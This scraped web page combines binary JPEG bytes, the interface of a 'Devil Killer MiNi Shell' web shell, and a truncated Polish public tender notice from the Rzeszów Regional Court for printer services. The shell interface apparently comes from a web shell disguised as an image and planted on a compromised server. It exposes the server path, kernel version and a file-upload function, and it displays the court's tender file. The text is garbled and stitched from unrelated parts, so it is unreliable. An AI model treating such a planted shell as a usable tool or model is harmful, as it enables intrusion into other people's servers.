JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220614/0020924101-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Uruchomienie i utrzymanie w Sądzie Okręgowym w Rzeszowie i podległych Sądach Rejonowych obsługi urządzeń drukujących. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Sąd Okręgowy w Rzeszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000324257</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Plac Śreniawitów 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rzeszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">35-959</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">17/ 87 56 200</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@rzeszow.so.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzeszow.so.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ kontroli państwowej i ochrony prawa oraz sąd i trybunał</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Wymiar Sprawiedliwości </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Uruchomienie i utrzymanie w Sądzie Okręgowym w Rzeszowie i podległych Sądach Rejonowych obsługi urządzeń drukujących. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9fb9f4a4-ebd8-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00209241</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00059011/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Usługa obsługi druku dla Sądu Okręgowego w Rzeszowie oraz podlegających Sądów Rejonowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.ms.gov.pl/czs <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Adres strony internetowej:<br/>https://ezamowienia.ms.gov.pl/czs<br/>W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji<br/>elektronicznej zapewnionych przez system zapewniający obsługę procesu udzielania zamówień<br/>publicznych za pośrednictwem środków komunikacji elektronicznej, zwany dalej Systemem. System<br/>jest dostępny pod adresem: https://ezamowienia.ms.gov.pl/czs Informacje o środkach komunikacji<br/>elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz<br/>informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej- zostały opisane w rozdziale IX Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami, w<br/>szczególności składanie ofert oraz oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez<br/>system zapewniający obsługę procesu udzielania zamówień publicznych za pośrednictwem środków komunikacji elektronicznej,<br/>zwany dalej Systemem. System jest dostępny pod adresem: https://ezamowienia.ms.gov.pl/czs Informacje o środkach komunikacji<br/>elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz<br/>informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania<br/>korespondencji elektronicznej- zostały opisane w rozdziale IX Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Administratorem danych osobowych przetwarzanych w<br/>Sądzie Okręgowym w Rzeszowie w związku z udzielaniem zamówień publicznych jest Dyrektor Sądu<br/>Okręgowego w Rzeszowie, Pl. Śreniawitów 3, 35-959 Rzeszów, tel. 17 875 63 23, email:<br/>dyrektor@rzeszow.so.gov.pl Dane kontaktowe inspektora ochrony danych Administrator danych<br/>wyznaczył Inspektora Ochrony Danych, nadzorującego prawidłowość przetwarzania danych<br/>osobowych w Sądzie Okręgowym w Rzeszowie, z którym można skontaktować: 1) listownie: Sąd<br/>Okręgowy w Rzeszowie, Plac Śreniawitów 3, 35-959 Rzeszów, 2) e-mail: iod@rzeszow.so.gov.pl. 3)<br/>telefonicznie: 17 875 62 24 Cele przetwarzania danych osobowych oraz podstawa prawna<br/>przetwarzania Państwa dane osobowe przetwarzane będą w celu prowadzenia postępowania o<br/>udzielenie zamówienia publicznego oraz zawarcia umowy, a podstawą prawną ich przetwarzania jest<br/>obowiązek prawny stosowania sformalizowanych procedur udzielania zamówień publicznych<br/>spoczywających na zamawiającym, w tym: m. in. ustawa z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych wraz z aktami wykonawczymi, ustawa z dnia 14 lipca 1983 r. o narodowym zasobie<br/>archiwalnym i archiwach. ustawa z dnia 23 kwietnia 1964 r. Kodeks cywilny. ustawa z dnia 27 sierpnia<br/>2009 r. o finansach publicznych. Informacje o odbiorcach danych osobowych lub o kategoriach<br/>odbiorców Sąd Okręgowy w Rzeszowie udostępnia dane osobowe innym odbiorcom lub kategoriom<br/>odbiorców, tj.: organom publicznym, instytucjom i innym podmiotom upoważnionym do dostępu lub<br/>otrzymania danych osobowych na podstawie przepisów prawa, w tym podmiotom którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Prawo zamówień<br/>publicznych. Sąd Okręgowy w Rzeszowie może udostępnić dane osobowe właściwym podmiotom oraz<br/>dostawcom niezbędnych usług podczas których przetwarzane są dane osobowe w imieniu<br/>Administratora także na podstawie stosownych umów. Okres, przez który dane osobowe będą<br/>przechowywane, lub kryteria ustalania tego okresu Pani/Pana dane osobowe będą przechowywane,<br/>zgodnie z art. 78 ust. 1 Prawo zamówień publicznych, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy. Następnie dokumentacja będzie archiwizowana przez okres wskazany w Jednolitym Rzeczowym Wykazie Akt, który Sąd Okręgowy w Rzeszowie<br/>zobowiązany jest stosować na mocy ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym<br/>i archiwach oraz rozporządzenia Ministra Kultury i Dziedzictwa Narodowego z dnia 20 października<br/>2015 r. w sprawie klasyfikowania i kwalifikowania dokumentacji, przekazywania materiałów<br/>archiwalnych do archiwów państwowych i brakowania dokumentacji niearchiwalnej. Informacje o<br/>prawie do żądania od administratora dostępu do danych osobowych dotyczących osoby, której dane<br/>dotyczą, ich sprostowania, usunięcia lub ograniczenia przetwarzania lub o prawie do wniesienia<br/>sprzeciwu wobec przetwarzania, a także o prawie do przenoszenia danych</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">ciąg dalszy obowiązku informacyjnego : Przysługuje<br/>Państwu prawo: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących; na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych<br/>osobowych przy czym skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w<br/>zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego<br/>załączników; na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym<br/>prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu zakończenia<br/>postępowania o udzielenie zamówienia; prawo do wniesienia skargi do Prezesa Urzędu Ochrony<br/>Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO. Nie przysługuje Państwu prawo: w związku z art. 17 ust. 3 lit. b, d lub e<br/>RODO prawo do usunięcia danych osobowych; prawo do przenoszenia danych osobowych, o którym<br/>mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">G-2512-3/22</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest:<br/>„Uruchomienie i utrzymanie w Sądzie Okręgowym w Rzeszowie i podległych Sądach Rejonowych obsługi urządzeń<br/>drukujących.”<br/>2. Zamawiający zleca wykonanie dostawy uruchomienia i utrzymania systemu kompleksowej obsługi urządzeń drukujących<br/>użytkowanych w budynkach Sądu Okręgowego w Rzeszowie. Przedmiot zamówienia realizowany będzie w poniżej<br/>określonych jednostkach sądowniczych w następujących lokalizacjach:<br/>1.1. Sąd Okręgowy w Rzeszowie:<br/>- Plac Śreniawitów 3, 35-959 Rzeszów<br/>- ul. Hetmańska 15 lokal użytkowy nr 18, 35-959 Rzeszów,<br/>1.2. Sąd Rejonowy w Leżajsku:<br/>- ul. A. Mickiewicza 47, 37-300 Leżajsk,<br/>1.3. Sąd Rejonowy w Łańcucie:<br/>- ul. Grunwaldzkiej 10, 37-100 Łańcut,<br/>1.4. Sąd Rejonowy w Ropczycach:<br/>- ul. Słowackiego 7, 39-100 Ropczyce,<br/>1.5. Sąd Rejonowy w Strzyżowie:<br/>- ul. 3 Maja 14, 38-100 Strzyżów,<br/>- ul. 8 Marca 9, 39-100 Strzyżów,<br/>2. Przedmiot zamówienia obejmuje w szczególności:<br/>2.1. dostawę materiałów eksploatacyjnych do urządzeń drukujących w lokalizacji danej jednostki sądowniczej;<br/>2.2. zapewnienie ciągłości pracy urządzeń drukujących, poprzez wykonywanie ich bieżących przeglądów i konserwacji;<br/>2.3. użyczenie zastępczych urządzeń drukujących – jeśli zaistnieje taka potrzeba po stronie Zamawiającego w lokalizacji<br/>danej jednostki sądowniczej (dostawa urządzenia);<br/>2.4. odbiór i utylizację zużytych (wykorzystanych) materiałów eksploatacyjnych wraz z ich opakowaniami;<br/>2.5. śledzenie i analizowanie przez Wykonawcę stanów zużycia materiałów eksploatacyjnych w urządzeniach drukujących<br/>jednostek sądowniczych, o których mowa w ust. 1 niniejszego paragrafu oraz na tej podstawie płynną i bieżącą ich dostawę;<br/>2.6. uruchomieniu na serwerach Zamawiającego w danej jednostce sądowniczej systemów zarządzająco - monitorujących,<br/>które umożliwią:<br/>a. monitorowanie stanu zużycia poszczególnych materiałów eksploatacyjnych dla wszystkich urządzeń drukujących<br/>widocznych w sieci lokalnej danej jednostki sądowniczej;<br/>b. pełną kontrolę kosztów wydruków (stron) dla poszczególnych urządzeń drukujących,<br/>c. możliwość wygenerowania historii zmiany materiałów eksploatacyjnych (tonery, bębny) z poziomu pojedynczego<br/>urządzenia drukującego w okresie min. pełnych 12-stu miesięcy.<br/>d. udostępnianie informacji dot. uszkodzenia materiałów eksploatacyjnych (tonerów).<br/>e. możliwość współpracy z już użytkowanymi przez poszczególne jednostki sądownicze urządzeniami drukującymi,<br/>połączonymi za pomocą połączeń LAN jak i USB.<br/>2.7. Wdrożenie systemu zarządzająco-monitorującego musi nastąpić w terminie nie dłuższym niż 15 dni kalendarzowych od<br/>dnia podpisania umowy, w każdej jednostce sądowniczej wymienionej objętej przedmiotem zamówienia.<br/>3. Za urządzenia drukujące Zamawiający uznaje drukarki, urządzenia wielofunkcyjne, kserokopiarki, drukarki do zadruku<br/>okładek akt sądowych, bez względu na stosowaną w nich technologię druku i obsługiwany format druku.<br/>4. Wykaz urządzeń drukujących jakimi dysponuje Zamawiający stanowi załącznik nr 1A do SWZ.<br/>5. Specyfikacja techniczna urządzeń drukujących, jakie powinny spełniać urządzenia udostępniane przez Wykonawcę do<br/>realizacji przedmiotu zamówienia stanowi załącznik nr 1B do SWZ.<br/>Zamawiający szacuje, że liczba stron wydruków formatu A4 w czasie trwania umowy we wszystkich jednostkach<br/>sądowniczych, przedstawia się następująco:<br/>- dla wydruków czarno-białych – 6 000 000 stron;<br/>- dla wydruków kolorowych – 100 000 stron </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30192113-6 - Wkłady drukujące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">79820000-8 - Usługi związane z drukowaniem</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się niżej opisanymi kryteriami:<br/>Kryterium Waga<br/>CENA 60 %<br/>TERMIN URUCHOMIENIA 20 %<br/>TERMIN DOSTAWY MATERIAŁÓW EKSPLOATACYJNYCH 20 %<br/>Przy ocenie ofert wartość wagowa wyrażona w procentach będzie wyrażona w punktach<br/>(1% = 1 pkt).<br/>Oferty będą oceniane w zakresie kryterium Ceny oferty, wg następującego wzoru:<br/>Pc= (Cn/Cb)*60<br/>gdzie:<br/>Pc - liczba punktów w kryterium Cena oferty, jakie Wykonawca uzyskał, z dokładnością do dwóch miejsc po przecinku;<br/>Cn - cena najtańszej oferty niepodlegającej odrzuceniu;<br/>Cb - cena oferty ocenianej niepodlegającej odrzuceniu;<br/>* - znak mnożenia<br/>/- znak dzielenia<br/>Oferty będą oceniane w zakresie kryterium: TERMIN DOSTAWY MATERIAŁÓW EKSPLOATACYJNYCH - Te<br/>w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców<br/>w zakresie tego kryterium, wg następującego wzoru:<br/>Wykonawca dostarczy materiały eksploatacyjne w terminie do 96 godzin od godziny zgłoszenia zapotrzebowania przez<br/>Zamawiającego - 0 ppkt<br/>Wykonawca dostarczy materiały eksploatacyjne w terminie do 72 godzin od godziny zgłoszenia zapotrzebowania przez Zamawiającego -1 ppkt<br/>Wykonawca dostarczy materiały eksploatacyjne w terminie do 48 godzin od godziny zgłoszenia zapotrzebowania przez<br/>Zamawiającego - 2 ppkt<br/>Wykonawca dostarczy materiały eksploatacyjne w terminie do 24 godzin od godziny zgłoszenia zapotrzebowania przez<br/>Zamawiającego - 3 ppkt<br/>Te= (Tb/Tn)*20<br/>gdzie:<br/>Te - liczba punktów jakie Wykonawca uzyskał w tym kryterium, z dokładnością do dwóch miejsc po przecinku;<br/>Tn - najwyższa liczba podpunktów uzyskanych w tym kryterium w ofertach niepodlegającej odrzuceniu;<br/>Tb - liczba podpunktów uzyskanych w tym kryterium w ofercie niepodlegającej odrzuceniu;<br/>* - znak mnożenia<br/>/-znak dzielenia<br/>Oferty będą oceniane w zakresie kryterium: TERMIN URUCHOMIENIA - Tw,<br/>w odniesieniu do najkorzystniejszych warunków przedstawionych przez wykonawców<br/>w zakresie tego kryterium, wg następującego wzoru:<br/>1) Wykonawca dokona rozpoczęcia świadczenia przedmiotu zamówienia poprzez, zainstalowanie i uruchomienie aplikacji do<br/>śledzenia wydruku we wszystkich jednostkach sądowniczych objętych przedmiotem zamówienia, w terminie do 15 dni od daty<br/>podpisania umowy – 0 pkt<br/>2) Wykonawca dokona rozpoczęcia świadczenia przedmiotu zamówienia poprzez, zainstalowanie i uruchomienie aplikacji do<br/>śledzenia wydruku we wszystkich jednostkach sądowniczych objętych przedmiotem zamówienia w terminie do 12 dni od daty<br/>podpisania umowy – 5 pkt<br/>3) Wykonawca dokona rozpoczęcia świadczenia przedmiotu zamówienia poprzez, zainstalowanie i uruchomienie aplikacji do<br/>śledzenia wydruku we wszystkich jednostkach sądowniczych objętych przedmiotem zamówienia w terminie do 9 dni od daty<br/>podpisania umowy – 10 pkt<br/>4) Wykonawca dokona rozpoczęcia świadczenia przedmiotu zamówienia poprzez, zainstalowanie i uruchomienie aplikacji do<br/>śledzenia wydruku we wszystkich jednostkach sądowniczych objętych przedmiotem zamówienia w terminie do 6 dni od daty<br/>podpisania umowy – 15 pkt<br/>5) Wykonawca dokona rozpoczęcia świadczenia przedmiotu zamówienia poprzez, zainstalowanie i uruchomienie aplikacji do<br/>śledzenia wydruku we wszystkich jednostkach sądowniczych objętych przedmiotem zamówienia w terminie do 3 dni od daty<br/>podpisania umowy – 20 pkt<br/>Ofertom nie odrzuconym zostaną przyznane pkt wg następującego wzoru:<br/>P= Pc +Te + Tw<br/>P= całkowita liczba punktów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN URUCHOMIENIA</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY MATERIAŁÓW EKSPLOATACYJNYCH</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Warunek - Zdolności technicznej lub zawodowej.<br/>Warunek zostanie uznany za spełniony, jeżeli:<br/>poprzez wykazanie, że Wykonawca:<br/>a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w<br/>tym okresie, wykonywał (lub wykonuje) co najmniej dwie dostawy odpowiadające 